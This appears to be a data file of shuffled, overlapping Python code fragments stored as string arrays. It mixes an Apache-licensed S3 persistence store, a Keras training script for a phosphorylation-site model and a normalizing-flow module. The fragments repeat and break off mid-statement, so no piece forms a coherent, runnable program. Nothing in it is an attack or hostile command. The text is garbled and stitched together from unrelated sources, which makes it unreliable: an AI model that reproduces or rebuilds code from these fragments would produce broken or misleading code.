"self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data)",
"specific language governing permissions and # limitations under the License. # # Author:",
"License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import",
"or agreed to in writing, software # distributed under the License is distributed",
"bucket.\"\"\" # connect after creating or with existing s3 client self.s3_client.connect() if not",
"local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect",
"Bigquery Data, it uses AWS S3 as of now as data store.\"\"\" def",
"or implied. # See the License for the specific language governing permissions and",
"bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing s3",
"bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3",
"import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger =",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if",
"with the License. # You may obtain a copy of the License at",
"= s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name,",
"PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS S3 as of",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.')",
"it uses AWS S3 as of now as data store.\"\"\" def __init__(self, s3_client=None):",
"in writing, software # distributed under the License is distributed on an \"AS",
"\"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client",
"= s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services )",
"S3 as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\"",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the"
] |
[
"= 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers = 5 nb_filter =",
"model model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0",
"methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate,",
"32 growth_rate = 32 # growth_rate = 24 filter_size_block1 = 13 filter_size_block2 =",
"opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) #",
"X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers =",
"keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import copy def model_net(X_train1, X_train2, X_train3,",
"filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output # choose",
"keras.layers import Dense, Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D",
"Model output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model",
"# choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy',",
"from sklearn import metrics from sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold,",
"train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout, Reshape from keras.layers",
"keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils import",
"import os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy",
"filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori = 1 dense_number",
"= 3 filter_size_ori = 1 dense_number = 32 dropout_rate = 0.2 dropout_dense =",
"Dense, Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models",
"import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils import to_categorical",
"import matplotlib.pyplot as plt import numpy as np from sklearn import metrics from",
"import optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers",
"from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout,",
"from methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block,",
"os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as",
"from keras.models import Sequential, Model from keras.utils.np_utils import to_categorical from keras import optimizers",
"sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import Dense,",
"filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output # choose optimazation",
"for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1,",
"dense_number, dropout_rate, dropout_dense, weight_decay) # Model output # choose optimazation opt = Adam(lr=learning_rate,",
"batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs= nb_epoch, shuffle=True, verbose=1) return",
"growth_rate = 32 # growth_rate = 24 filter_size_block1 = 13 filter_size_block2 = 7",
"0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), #",
"weight_decay) # Model output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08)",
"= model model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch >",
"import Dense, Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from",
"= X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block",
"X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:]",
"- 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size,",
"= 32 # growth_rate = 24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3",
"model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in range(len(model2.layers)",
"# growth_rate = 24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 = 3",
"filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori = 1 dense_number = 32 dropout_rate",
"epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights is",
"Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2,",
"Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights#",
"beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if",
"num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2,",
"import l2 import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2",
"= 32 growth_rate = 32 # growth_rate = 24 filter_size_block1 = 13 filter_size_block2",
"# ################### from methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3,",
"0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size = 512 ################### # Construct",
"################### # Construct model # ################### from methods.phosnet import Phos model = Phos(nb_classes,",
"dropout_rate = 0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size = 512 ###################",
"metrics=['accuracy']) # load weights# if weights is not None: model.load_weights(weights) # model2 =",
"nb_batch_size = 512 ################### # Construct model # ################### from methods.phosnet import Phos",
"= Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter,",
"plt import numpy as np from sklearn import metrics from sklearn import preprocessing",
"model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in range(len(model2.layers) - 1):",
"y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs= nb_epoch, shuffle=True, verbose=1)",
"from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils",
"as plt import numpy as np from sklearn import metrics from sklearn import",
"##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers = 5",
"nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters#########",
"# Construct model # ################### from methods.phosnet import Phos model = Phos(nb_classes, nb_layers,",
"import numpy as np from sklearn import metrics from sklearn import preprocessing from",
"Construct model # ################### from methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1,",
"optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import",
"Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model",
"dropout_rate, dropout_dense, weight_decay) # Model output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9,",
"compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights is not None: model.load_weights(weights)",
"512 ################### # Construct model # ################### from methods.phosnet import Phos model =",
"= 0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size = 512 ################### #",
"X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate =",
"1 nb_layers = 5 nb_filter = 32 growth_rate = 32 # growth_rate =",
"from keras.regularizers import l2 import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes",
"= 24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori =",
"from keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import l2",
"X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs= nb_epoch, shuffle=True,",
"metrics from sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers",
"load weights# if weights is not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2",
"matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np from sklearn import metrics",
"dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size = 512 ################### # Construct model",
"X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3",
"# model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights is not",
"import itertools import os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt",
"import train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout, Reshape from",
"2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form =",
"> 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val),",
"numpy as np from sklearn import metrics from sklearn import preprocessing from sklearn.model_selection",
"img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate,",
"MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils import to_categorical from keras import",
"import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation,",
"growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output",
"weights is not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights)",
"nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3,",
"from keras.utils.np_utils import to_categorical from keras import optimizers from keras.optimizers import Adam, SGD",
"model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 =",
"from keras.layers import Dense, Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D,",
"img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay)",
"13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori = 1 dense_number = 32",
"32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size = 512",
"32 # growth_rate = 24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 =",
"copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if",
"1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, #",
"filter_size_ori = 1 dense_number = 32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay",
"filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output #",
"keras.models import Sequential, Model from keras.utils.np_utils import to_categorical from keras import optimizers from",
"img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001",
"keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import",
"as np from sklearn import metrics from sklearn import preprocessing from sklearn.model_selection import",
"dense_number = 32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size",
"nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:]",
"nb_dense_block = 1 nb_layers = 5 nb_filter = 32 growth_rate = 32 #",
"import functools import itertools import os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot",
"matplotlib.pyplot as plt import numpy as np from sklearn import metrics from sklearn",
"init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers = 5 nb_filter",
"choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt,",
"# load weights# if weights is not None: model.load_weights(weights) # model2 = copy.deepcopy(model)",
"import to_categorical from keras import optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization",
"= 0.001 nb_dense_block = 1 nb_layers = 5 nb_filter = 32 growth_rate =",
"img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform'",
"3 filter_size_ori = 1 dense_number = 32 dropout_rate = 0.2 dropout_dense = 0.3",
"Conv2D, MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils import to_categorical from keras",
"y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 =",
"0.3 weight_decay = 0.0001 nb_batch_size = 512 ################### # Construct model # ###################",
"model # ################### from methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2,",
"= 0.3 weight_decay = 0.0001 nb_batch_size = 512 ################### # Construct model #",
"copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:]",
"None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in",
"0.001 nb_dense_block = 1 nb_layers = 5 nb_filter = 32 growth_rate = 32",
"model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 :",
"preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation, Flatten,",
"nb_layers = 5 nb_filter = 32 growth_rate = 32 # growth_rate = 24",
"= 7 filter_size_block3 = 3 filter_size_ori = 1 dense_number = 32 dropout_rate =",
"nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number,",
"import BatchNormalization from keras.regularizers import l2 import copy def model_net(X_train1, X_train2, X_train3, y_train,",
"output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile",
"nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model",
"################### from methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form,",
"import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np",
"Model from keras.utils.np_utils import to_categorical from keras import optimizers from keras.optimizers import Adam,",
"growth_rate = 24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori",
"filter_size_block3 = 3 filter_size_ori = 1 dense_number = 32 dropout_rate = 0.2 dropout_dense",
"Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import",
"SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import copy def model_net(X_train1,",
"model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3,",
"Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential,",
"Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils import to_categorical from",
"to_categorical from keras import optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization import",
"l2 import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1",
"init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) #",
"dropout_dense, weight_decay) # Model output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999,",
"weights# if weights is not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 =",
"= copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights())",
"nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output # choose optimazation opt",
"keras.regularizers import l2 import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes =",
"# validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs= nb_epoch, shuffle=True, verbose=1) return model",
"= 1 nb_layers = 5 nb_filter = 32 growth_rate = 32 # growth_rate",
"def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2",
"import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1,",
"random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np from",
"= X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers",
"from keras import optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization",
"X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs= nb_epoch,",
"model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights is not None: model.load_weights(weights) #",
"functools import itertools import os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as",
"model2 = model model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch",
"Sequential, Model from keras.utils.np_utils import to_categorical from keras import optimizers from keras.optimizers import",
"model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs=",
"beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights",
"weight_decay = 0.0001 nb_batch_size = 512 ################### # Construct model # ################### from",
"# model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in range(len(model2.layers) -",
"import metrics from sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from",
"import Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import copy",
"Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model from",
"img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1",
"import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np from sklearn",
"cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D,",
"range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train,",
"model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights is not None:",
"nb_filter = 32 growth_rate = 32 # growth_rate = 24 filter_size_block1 = 13",
"Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori,",
"# Model output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) #",
"is not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for",
"Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import copy def",
"X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block =",
"BatchNormalization from keras.regularizers import l2 import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None):",
"from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import copy def model_net(X_train1, X_train2,",
"np from sklearn import metrics from sklearn import preprocessing from sklearn.model_selection import train_test_split,",
"sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout, Reshape",
"sklearn import metrics from sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score",
"model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1,",
"if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2,",
"if weights is not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model",
"import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 =",
"= 1 dense_number = 32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay =",
"= 32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size =",
"24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori = 1",
"= 13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori = 1 dense_number =",
"in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3],",
"'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers = 5 nb_filter = 32",
"7 filter_size_block3 = 3 filter_size_ori = 1 dense_number = 32 dropout_rate = 0.2",
"import Sequential, Model from keras.utils.np_utils import to_categorical from keras import optimizers from keras.optimizers",
"0.0001 nb_batch_size = 512 ################### # Construct model # ################### from methods.phosnet import",
"itertools import os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import",
"keras import optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization from",
"learning_rate = 0.001 nb_dense_block = 1 nb_layers = 5 nb_filter = 32 growth_rate",
"img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense,",
"optimizer=opt, metrics=['accuracy']) # load weights# if weights is not None: model.load_weights(weights) # model2",
"= 0.0001 nb_batch_size = 512 ################### # Construct model # ################### from methods.phosnet",
"filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output # choose optimazation opt =",
"= X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate",
"optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])",
": model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1,",
"matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np from sklearn import",
"keras.utils.np_utils import to_categorical from keras import optimizers from keras.optimizers import Adam, SGD from",
"= 512 ################### # Construct model # ################### from methods.phosnet import Phos model",
"1 dense_number = 32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay = 0.0001",
"<filename>methods/model_n.py import functools import itertools import os import random import matplotlib matplotlib.use('Agg') import",
"= 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form",
"= 5 nb_filter = 32 growth_rate = 32 # growth_rate = 24 filter_size_block1",
"not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for num",
"from sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import",
"KFold, cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout, Reshape from keras.layers import",
"5 nb_filter = 32 growth_rate = 32 # growth_rate = 24 filter_size_block1 =",
"= Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load"
] |
[
"for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], []))",
"- 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha +",
"hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac =",
"batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z,",
"torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def",
"torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape),",
"def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha =",
"dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown",
"else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image)",
"= torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise",
"def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape",
"= (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return",
